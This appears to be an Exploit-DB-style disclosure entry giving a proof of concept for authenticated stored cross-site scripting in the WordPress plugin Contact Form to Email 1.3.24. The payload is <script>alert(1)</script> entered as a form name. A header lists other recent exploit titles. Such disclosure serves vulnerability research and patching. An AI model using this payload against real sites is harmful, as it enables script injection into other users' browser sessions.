
6 changes to exploits/shellcodes WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS) KONGA 0.14.9 - Privilege Escalation Simple Subscription Website 1.0 - SQLi Authentication Bypass Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated) WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated) PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
16 lines
No EOL
680 B
Text
16 lines
No EOL
680 B
Text
# Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
|
|
# Date: 11/11/2021
|
|
# Exploit Author: Mohammed Aadhil Ashfaq
|
|
# Vendor Homepage: https://form2email.dwbooster.com/
|
|
# Version: 1.3.24
|
|
# Tested on: wordpress
|
|
|
|
POC
|
|
1. Click Contact form to Email
|
|
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail
|
|
2. Create new form name with <script>alert(1)</script>
|
|
3. Click Publish
|
|
4. XSS has been triggered
|
|
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687
|
|
5. Open a different browser, logged in with wordpress. Copy the URL and
|
|
Press enter. XSS will trigger. |